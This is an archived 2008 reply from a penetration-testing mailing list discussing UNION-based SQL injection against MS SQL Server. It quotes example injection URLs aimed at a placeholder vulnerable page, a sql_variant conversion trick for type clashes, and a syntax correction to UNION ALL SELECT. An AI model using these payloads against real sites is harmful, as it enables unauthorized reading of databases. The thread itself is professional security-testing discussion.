Penetration Testing mailing list archives

Re: SQL Injection: Issue with UNION SELECT ALL

From: Francois Larouche <francois.larouche-ml () sqlpowerinjector com>
Date: Thu, 10 Jan 2008 14:16:38 -0800

I wouldn't agree with your statement Zed.

What he found was where the first conversion clash occurred. It seemsthat your third expression is text field, no big deal. For some reasonSQL Server gives a higher priority on text is incompatible with interror or any casting problem than the equal number of expressions in aUNION clause. Believe me I learned that at my expense...


The actual number is 16 if I counted well with his HAVING test.

Your problem now Joseph is just to make sure that you can have the rightformat. If you use NULL it will work each time, however you won't getanything back...

The error you have is that you used SELECT ALL, in fact you need to useUNION ALL SELECT .... the ALL goes between UNION and SELECT


Good luck

Francois

Zed Qyves wrote:

Hello,

you seem to have successfully enumerated the number of fields of the
first query at
----------------------------------------------------------------------------------
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 UNION SELECT
ALL 1,2,3--
       Returns:
       Operand type clash: text is incompatible with int

       Reference Found:
       http://archives.neohapsis.com/archives/sf/pentest/2003-02/0094.html
--------------------------------------------------------------------------------

you can use the convert and sql_variant data type of MS SQL SERVER to
get to the right data types as well.

so you query would look like...

-------------------------------------------------------------------------------
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 UNION SELECT
ALL convert(sql_variant,1),convert(sql_variant,2),convert(sql_variant,3)--

Reference:
       http://www.sqlsecurity.com/LinkClick.aspx?link=SQL+Server+Security.ppt&tabid=60&mid=398

-------------------------------------------------------------------------------

Have fun,
ZQ



------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------

Current thread:

SQL Injection: Issue with UNION SELECT ALL Joseph McCray (Jan 09)
- Re: SQL Injection: Issue with UNION SELECT ALL Zed Qyves (Jan 10)
  - Re: SQL Injection: Issue with UNION SELECT ALL Francois Larouche (Jan 10)
    - Re: SQL Injection: Issue with UNION SELECT ALL Zed Qyves (Jan 14)
    - Re: SQL Injection: Issue with UNION SELECT ALL Francois Larouche (Jan 15)